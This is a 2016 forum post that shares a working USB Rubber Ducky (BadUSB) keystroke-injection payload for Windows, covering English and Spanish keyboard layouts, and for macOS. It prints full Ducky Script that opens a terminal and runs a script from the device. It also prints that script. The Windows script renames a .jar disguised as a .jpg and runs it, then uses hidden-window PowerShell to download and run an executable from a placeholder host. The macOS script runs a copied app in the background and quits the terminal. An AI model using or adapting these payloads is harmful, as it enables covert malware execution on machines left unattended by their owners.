Mohamed A. Baset Posted November 27, 2016 Share Posted November 27, 2016 Hi Guys, Hola Chicos Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc.. Long time ago i was working hard to get the ideal cross-platform payload which works: 1. Cross-OSes 2. Cross-keyboard layouts (not all of them currently) As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool! Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers! The Windows part (Win 8.1 Eng & Win 7 Esp) So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go: DEFAULT_DELAY 75 DELAY 1000 WINDOWS r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING for %p in DELAY 10 SHIFT 8 STRING A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z DELAY 10 SHIFT 9 DELAY 100 STRING do %p DELAY 10 SHIFT . SHIFT 7 STRING r.bat ENTER DELAY 100 STRING for %p in DELAY 100 STRING (A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z) DELAY 100 STRING do %p:/r.bat ENTER You guys don't need me for sure to explain each step but i will only explain the highlights: 1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want) 2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout) You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content: @echo off color 10 REM Getting our drive letter which have the name SYMB assign to symb for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"')do set symb=%%d REM Copy a NOTmalicious file to the temp folder copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y REM Executing the NOTmalicious file start %tmp%\NOTmalicious.jar REM Downloading and executing another NOTmalicious file powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe" REM Goodbye exit It doesn't matter now what language the machine you're executing the bat file on. The macOS part (English KB Layout) The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world) So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste DEFAULT_DELAY 75 DELAY 1000 GUI SPACE DELAY 500 STRING terminal DELAY 100 ENTER DELAY 500 STRING chmod +X /Volumes/SYMB/symbiansymoh.sh ENTER DELAY 100 STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null & ENTER DELAY 100 GUI q DELAY 300 ENTER And again for feeding your curiosity here's the content of my symbiansymoh.sh file: #!/bin/bash rm -r /tmp/NOTmalicious.app; cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app; open /tmp/NOTmalicious.app; that copies a stored NOTmalicious.app file to the temp folder then executes it. Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI The topic is open to discussion, Any ideas, modification is always welcome! Cheers and have a great weekend guys! Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.